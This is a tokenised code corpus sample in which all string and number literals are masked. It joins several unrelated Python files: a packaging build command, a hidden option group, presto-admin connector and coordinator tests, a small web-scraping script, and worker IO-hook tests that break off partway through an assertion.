<EOL> line = re . sub ( r'<STR_LIT>' , wheel_name , line ) <EOL> line = re . sub ( r'<STR_LIT>' , self . virtualenv_version , <EOL> line ) <EOL> install_script . write ( line ) <EOL> install_script . close ( ) <EOL> template . close ( ) <EOL> os . chmod ( os . path . join ( build_dir , '<STR_LIT>' ) , <NUM_LIT> ) <EOL> def package_dependencies ( self , build_dir ) : <EOL> thirdparty_dir = os . path . join ( build_dir , '<STR_LIT>' ) <EOL> requirements = self . distribution . install_requires <EOL> for requirement in requirements : <EOL> pip . main ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( thirdparty_dir ) , <EOL> '<STR_LIT>' , <EOL> requirement , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> pycrypto_whl = '<STR_LIT>' <EOL> pypi_pycrypto_url = '<STR_LIT>' + '<STR_LIT>' + pycrypto_whl <EOL> if sys . version . startswith ( '<STR_LIT>' ) : <EOL> alternate_interpreter_version = '<STR_LIT>' <EOL> else : <EOL> alternate_interpreter_version = '<STR_LIT>' <EOL> urllib . urlretrieve ( <EOL> pypi_pycrypto_url . format ( alternate_interpreter_version ) , <EOL> os . path . join ( <EOL> thirdparty_dir , <EOL> pycrypto_whl . format ( alternate_interpreter_version ) ) <EOL> ) <EOL> pip . main ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> thirdparty_dir , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( self . virtualenv_version ) ] ) <EOL> def archive_dist ( self , build_dir , dist_dir ) : <EOL> archive_basename = self . distribution . get_fullname ( ) <EOL> if self . online_install : <EOL> archive_basename += '<STR_LIT>' <EOL> else : <EOL> archive_basename += '<STR_LIT>' <EOL> archive_file = os . path . join ( dist_dir , archive_basename ) <EOL> self . mkpath ( os . path . dirname ( archive_file ) ) <EOL> self . make_archive ( archive_file , '<STR_LIT>' , <EOL> root_dir = os . path . dirname ( build_dir ) , <EOL> base_dir = os . path . basename ( build_dir ) ) <EOL> logger . info ( '<STR_LIT>' , archive_file ) <EOL> def run ( self ) : <EOL> build_dir = self . bdist_dir <EOL> self . mkpath ( build_dir ) <EOL> wheel_name = self . build_wheel ( build_dir ) <EOL> self . generate_install_script ( wheel_name , build_dir ) <EOL> if not self . online_install : <EOL> self . package_dependencies ( build_dir ) <EOL> self . archive_dist ( build_dir , self . dist_dir ) <EOL> if not self . keep_temp : <EOL> remove_tree ( build_dir ) <EOL> def initialize_options ( self ) : <EOL> self . bdist_dir = None <EOL> self . dist_dir = None <EOL> self . virtualenv_url_base = None <EOL> self . virtualenv_version = None <EOL> self . keep_temp = False <EOL> self . online_install = False <EOL> def finalize_options ( self ) : <EOL> if self . bdist_dir is None : <EOL> bdist_base = self . get_finalized_command ( '<STR_LIT>' ) . bdist_base <EOL> self . bdist_dir = os . path . join ( bdist_base , <EOL> self . distribution . get_name ( ) ) <EOL> if self . dist_dir is None : <EOL> self . dist_dir = '<STR_LIT>' <EOL> if self . virtualenv_version is None : <EOL> self . virtualenv_version = self . default_virtualenv_version </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from optparse import OptionGroup <EOL> _LOGGER = logging . getLogger ( __name__ ) <EOL> class HiddenOptionGroup ( OptionGroup ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parser , title , description = None , suppress_help = False ) : <EOL> OptionGroup . __init__ ( self , parser , title , description ) <EOL> self . suppress_help = suppress_help <EOL> def format_help ( self , formatter ) : <EOL> if not self . suppress_help : <EOL> return OptionGroup . format_help ( self , formatter ) <EOL> else : <EOL> return "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import os <EOL> from nose . plugins . attrib import attr <EOL> from prestoadmin . standalone . config import PRESTO_STANDALONE_USER <EOL> from prestoadmin . util import constants <EOL> from tests . no_hadoop_bare_image_provider import NoHadoopBareImageProvider <EOL> from tests . product . base_product_case import BaseProductTestCase , docker_only , PrestoError <EOL> from tests . product . constants import LOCAL_RESOURCES_DIR <EOL> from tests . product . standalone . presto_installer import StandalonePrestoInstaller <EOL> class TestConnectors ( BaseProductTestCase ) : <EOL> def setup_cluster_assert_connectors ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . assert_has_default_connector ( host ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> def test_basic_connector_add_remove ( self ) : <EOL> self . setup_cluster_assert_connectors ( ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . assert_path_removed ( self . cluster . master , <EOL> os . path . join ( constants . CONNECTORS_DIR , <EOL> '<STR_LIT>' ) ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] ] ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . assert_path_removed ( host , <EOL> os . path . join ( constants . REMOTE_CATALOG_DIR , <EOL> '<STR_LIT>' ) ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . assert_has_default_connector ( host ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> def test_connector_add_remove_coord_worker_using_dash_h ( self ) : <EOL> self . setup_cluster_assert_connectors ( ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . assert_path_removed ( self . cluster . master , <EOL> os . path . join ( constants . CONNECTORS_DIR , <EOL> '<STR_LIT>' ) ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] ] ) <EOL> for host in [ self . cluster . master , self . cluster . slaves [ <NUM_LIT:0> ] ] : <EOL> self . assert_path_removed ( host , <EOL> os . path . join ( constants . REMOTE_CATALOG_DIR , <EOL> '<STR_LIT>' ) ) <EOL> self . assert_has_default_connector ( self . cluster . slaves [ <NUM_LIT:1> ] ) <EOL> self . assert_has_default_connector ( self . cluster . slaves [ <NUM_LIT:2> ] ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . assert_has_default_connector ( self . cluster . master ) <EOL> self . assert_has_default_connector ( self . cluster . slaves [ <NUM_LIT:1> ] ) <EOL> def test_connector_add_remove_coord_worker_using_dash_x ( self ) : <EOL> self . setup_cluster_assert_connectors ( ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> self . assert_has_default_connector ( self . cluster . master ) <EOL> self . assert_has_default_connector ( self . cluster . slaves [ <NUM_LIT:0> ] ) <EOL> for host in [ self . cluster . slaves [ <NUM_LIT:1> ] , self . cluster . slaves [ <NUM_LIT:2> ] ] : <EOL> self . assert_path_removed ( host , <EOL> os . path . join ( constants . REMOTE_CATALOG_DIR , <EOL> '<STR_LIT>' ) ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> for slave in [ self . cluster . slaves [ <NUM_LIT:1> ] , self . cluster . slaves [ <NUM_LIT:2> ] ] : <EOL> self . assert_has_default_connector ( slave ) <EOL> @ docker_only <EOL> def test_connector_add_wrong_permissions ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> script = '<STR_LIT>' '<STR_LIT>' <EOL> output = self . run_script_from_prestoadmin_dir ( script ) <EOL> with open ( os . path . join ( LOCAL_RESOURCES_DIR , <EOL> '<STR_LIT>' ) , '<STR_LIT:r>' ) as f : <EOL> expected = f . read ( ) % { '<STR_LIT>' : self . cluster . internal_master , <EOL> '<STR_LIT>' : self . cluster . internal_slaves [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : self . cluster . internal_slaves [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : self . cluster . internal_slaves [ <NUM_LIT:2> ] } <EOL> self . assertEqualIgnoringOrder ( expected , output ) <EOL> script = '<STR_LIT>' '<STR_LIT>' <EOL> output = self . run_script_from_prestoadmin_dir ( script ) <EOL> permission_error = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> self . assertEqualIgnoringOrder ( output , permission_error ) <EOL> script = '<STR_LIT>' '<STR_LIT>' <EOL> not_found_error = self . fatal_error ( <EOL> '<STR_LIT>' ) <EOL> self . assertRaisesRegexp ( OSError , not_found_error , <EOL> self . run_script_from_prestoadmin_dir , script ) <EOL> def test_connector_add_missing_connector ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> not_found_error = self . fatal_error ( <EOL> '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . assertRaisesRegexp ( OSError , not_found_error , <EOL> self . run_prestoadmin , '<STR_LIT>' ) <EOL> def test_connector_add_no_dir ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> self . cluster . exec_cmd_on_host ( <EOL> self . cluster . master , <EOL> '<STR_LIT>' ) <EOL> missing_dir_error = self . fatal_error ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaisesRegexp ( OSError , missing_dir_error , <EOL> self . run_prestoadmin , '<STR_LIT>' ) <EOL> def test_connector_add_by_name ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . assert_has_default_connector ( host ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> def test_connector_add_empty_dir ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> output = self . run_prestoadmin ( '<STR_LIT>' ) <EOL> output = self . run_prestoadmin ( '<STR_LIT>' ) <EOL> expected = """<STR_LIT>""" <EOL> self . assertEqualIgnoringOrder ( expected , output ) <EOL> def test_connector_add_two_connectors ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> filepath = '<STR_LIT>' <EOL> self . assert_has_default_connector ( host ) <EOL> self . assert_file_perm_owner ( host , filepath , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_file_content ( host , filepath , '<STR_LIT>' ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> def fatal_error ( self , error ) : <EOL> message = """<STR_LIT>""" <EOL> return message % { '<STR_LIT:error>' : error } <EOL> def test_connector_add_lost_host ( self ) : <EOL> installer = StandalonePrestoInstaller ( self ) <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , self . PA_ONLY_CLUSTER ) <EOL> self . upload_topology ( ) <EOL> installer . install ( ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . cluster . stop_host ( <EOL> self . cluster . slaves [ <NUM_LIT:0> ] ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> output = self . run_prestoadmin ( '<STR_LIT>' , raise_error = False ) <EOL> for host in self . cluster . all_internal_hosts ( ) : <EOL> deploying_message = '<STR_LIT>' '<STR_LIT>' <EOL> self . assertTrue ( deploying_message % host in output , <EOL> '<STR_LIT>' <EOL> % ( deploying_message % host , output ) ) <EOL> self . assertRegexpMatches ( <EOL> output , <EOL> self . down_node_connection_error ( self . cluster . internal_slaves [ <NUM_LIT:0> ] ) <EOL> ) <EOL> self . assertEqual ( len ( output . splitlines ( ) ) , <EOL> len ( self . cluster . all_hosts ( ) ) + <EOL> self . len_down_node_error ) <EOL> self . run_prestoadmin ( '<STR_LIT>' , raise_error = False ) <EOL> for host in [ self . cluster . master , <EOL> self . cluster . slaves [ <NUM_LIT:1> ] , <EOL> self . cluster . slaves [ <NUM_LIT:2> ] ] : <EOL> self . assert_has_default_connector ( host ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> def test_connector_remove ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . assert_has_default_connector ( host ) <EOL> missing_connector_message = """<STR_LIT>""" <EOL> success_message = """<STR_LIT>""" <EOL> self . assertRaisesMessageIgnoringOrder ( <EOL> OSError , <EOL> missing_connector_message % { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> self . run_prestoadmin , <EOL> '<STR_LIT>' ) <EOL> self . cluster . exec_cmd_on_host ( <EOL> self . cluster . master , <EOL> '<STR_LIT>' <EOL> ) <EOL> output = self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . assertEqualIgnoringOrder ( success_message , output ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . assertRaisesMessageIgnoringOrder ( <EOL> OSError , <EOL> missing_connector_message % { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> self . run_prestoadmin , <EOL> '<STR_LIT>' ) <EOL> def test_connector_name_not_found ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> expected = self . fatal_error ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaisesRegexp ( OSError , expected , self . run_prestoadmin , <EOL> '<STR_LIT>' ) <EOL> def test_connector_add_no_presto_user ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . cluster . exec_cmd_on_host ( <EOL> host , "<STR_LIT>" % ( PRESTO_STANDALONE_USER , ) ) <EOL> self . assertRaisesRegexp ( <EOL> OSError , "<STR_LIT>" , self . run_prestoadmin , <EOL> '<STR_LIT>' ) <EOL> def get_connector_info ( self ) : <EOL> output = self . cluster . exec_cmd_on_host ( <EOL> self . cluster . master , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> data = self . get_key_value ( output , '<STR_LIT:data>' ) <EOL> next_uri = self . get_key_value ( output , '<STR_LIT>' ) <EOL> while not data and next_uri : <EOL> output = self . cluster . exec_cmd_on_host ( <EOL> self . cluster . master , <EOL> '<STR_LIT>' % self . get_key_value ( output , '<STR_LIT>' ) <EOL> ) <EOL> data = self . get_key_value ( output , '<STR_LIT:data>' ) <EOL> next_uri = self . get_key_value ( output , '<STR_LIT>' ) <EOL> if not data : <EOL> raise PrestoError ( '<STR_LIT>' <EOL> '<STR_LIT>' % output ) <EOL> return data <EOL> def get_key_value ( self , text , key ) : <EOL> try : <EOL> return json . loads ( text ) [ key ] <EOL> except KeyError : <EOL> return '<STR_LIT>' <EOL> except ValueError as e : <EOL> raise ValueError ( e . message + '<STR_LIT:\n>' + text ) <EOL> def _assert_connectors_loaded ( self , expected_connectors ) : <EOL> self . retry ( lambda : self . assertEqual ( expected_connectors , <EOL> self . get_connector_info ( ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from fabric . api import env <EOL> from mock import patch <EOL> from prestoadmin import coordinator <EOL> from prestoadmin . util . exception import ConfigurationError <EOL> from tests . base_test_case import BaseTestCase <EOL> class TestCoordinator ( BaseTestCase ) : <EOL> def test_build_all_defaults ( self ) : <EOL> env . roledefs [ '<STR_LIT>' ] = '<STR_LIT:a>' <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> actual_default = coordinator . Coordinator ( ) . build_all_defaults ( ) <EOL> expected = { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:false>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> self . assertEqual ( actual_default , expected ) <EOL> def test_defaults_coord_is_worker ( self ) : <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT:a>' ] <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> actual_default = coordinator . Coordinator ( ) . build_all_defaults ( ) <EOL> expected = { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> self . assertEqual ( actual_default , expected ) <EOL> def test_validate_valid ( self ) : <EOL> conf = { '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assertEqual ( conf , coordinator . Coordinator . validate ( conf ) ) <EOL> def test_validate_default ( self ) : <EOL> env . roledefs [ '<STR_LIT>' ] = '<STR_LIT:localhost>' <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT:localhost>' ] <EOL> conf = coordinator . Coordinator ( ) . build_all_defaults ( ) <EOL> self . assertEqual ( conf , coordinator . Coordinator . validate ( conf ) ) <EOL> def test_invalid_conf ( self ) : <EOL> conf = { '<STR_LIT>' : { } } <EOL> self . assertRaisesRegexp ( ConfigurationError , <EOL> '<STR_LIT>' , <EOL> coordinator . Coordinator . validate , conf ) <EOL> def test_invalid_conf_missing_coordinator ( self ) : <EOL> conf = { '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> self . assertRaisesRegexp ( ConfigurationError , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> coordinator . Coordinator . validate , conf ) <EOL> def test_invalid_conf_coordinator ( self ) : <EOL> conf = { '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:false>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> self . assertRaisesRegexp ( ConfigurationError , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> coordinator . Coordinator . validate , conf ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_conf_empty_is_default ( self , get_conf_from_file_mock , <EOL> write_mock ) : <EOL> env . roledefs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT:L>' ] <EOL> get_conf_from_file_mock . return_value = { } <EOL> self . assertEqual ( coordinator . Coordinator ( ) . get_conf ( ) , <EOL> coordinator . Coordinator ( ) . build_all_defaults ( ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_conf ( self , get_conf_from_file_mock , write_mock ) : <EOL> env . roledefs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> env . roledefs [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT:L>' ] <EOL> file_conf = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:value>' , <EOL> '<STR_LIT>' : '<STR_LIT:test>' } } <EOL> get_conf_from_file_mock . return_value = file_conf <EOL> expected = { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT:value>' , <EOL> '<STR_LIT>' : '<STR_LIT:test>' } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:false>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> self . assertEqual ( coordinator . Coordinator ( ) . get_conf ( ) , expected ) </s>
<s> import requests <EOL> import json <EOL> from lxml import html <EOL> api_key = '<STR_LIT>' <EOL> url_template = '<STR_LIT>' <EOL> session_cookie = '<STR_LIT>' <EOL> input_fetch = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT:url>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : session_cookie , <EOL> } , <EOL> } , <EOL> } <EOL> print '<STR_LIT>' <EOL> travel_benefits_link = '<STR_LIT>' <EOL> input_fetch [ '<STR_LIT:data>' ] [ '<STR_LIT:url>' ] = travel_benefits_link <EOL> headers = { <EOL> '<STR_LIT>' : api_key , <EOL> } <EOL> r = requests . post ( url_template % '<STR_LIT>' , headers = headers , data = json . dumps ( input_fetch ) ) <EOL> output_full = r . json ( ) <EOL> html_content = output_full [ '<STR_LIT:data>' ] [ '<STR_LIT:content>' ] <EOL> tree = html . fromstring ( html_content . encode ( '<STR_LIT:utf-8>' ) ) <EOL> tree . make_links_absolute ( travel_benefits_link ) <EOL> print '<STR_LIT>' <EOL> benefit_links = tree . xpath ( '<STR_LIT>' ) <EOL> benefits = { } <EOL> for link in benefit_links [ : <NUM_LIT:3> ] : <EOL> benefit_name = link . text . strip ( ) <EOL> print '<STR_LIT>' % benefit_name <EOL> input_fetch [ '<STR_LIT:data>' ] [ '<STR_LIT:url>' ] = link . get ( '<STR_LIT>' ) <EOL> r = requests . post ( url_template % '<STR_LIT>' , headers = headers , data = json . dumps ( input_fetch ) ) <EOL> output_full = r . json ( ) <EOL> html_content = output_full [ '<STR_LIT:data>' ] [ '<STR_LIT:content>' ] <EOL> tree = html . fromstring ( html_content . encode ( '<STR_LIT:utf-8>' ) ) <EOL> tree . make_links_absolute ( travel_benefits_link ) <EOL> benefits [ benefit_name ] = tree . xpath ( '<STR_LIT>' ) [ <NUM_LIT:0> ] . text_content ( ) <EOL> print '<STR_LIT>' <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as f : <EOL> f . write ( json . dumps ( benefits ) ) </s>
<s> SIMULATE_ZOMBIE_JOBS = True </s>
<s> import json <EOL> def test_io_hooks_nothing ( worker ) : <EOL> worker . start ( flags = "<STR_LIT>" ) <EOL> assert worker . send_task ( <EOL> "<STR_LIT>" , { "<STR_LIT:a>" : <NUM_LIT> , "<STR_LIT:b>" : <NUM_LIT:1> } ) == <NUM_LIT> <EOL> events = json . loads ( <EOL> worker . send_task ( "<STR_LIT>" , { } ) ) <EOL> job_events = [ x for x in events if x . get ( "<STR_LIT>" ) ] <EOL> for evt in job_events : <EOL> print evt <EOL> assert len ( job_events ) == <NUM_LIT:1> * <NUM_LIT:2> <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> def test_io_hooks_redis ( worker ) : <EOL> worker . start ( flags = "<STR_LIT>" ) <EOL> worker . send_task ( <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:test>" : "<STR_LIT>" , "<STR_LIT>" : { "<STR_LIT:key>" : "<STR_LIT>" } } <EOL> ) <EOL> events = json . loads ( <EOL> worker . send_task ( "<STR_LIT>" , { } ) ) <EOL> job_events = [ x for x in events if x . get ( "<STR_LIT>" ) ] <EOL> for evt in job_events : <EOL> print evt <EOL> assert len ( job_events ) == <NUM_LIT:2> * <NUM_LIT:2> <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT:key>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT:key>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == 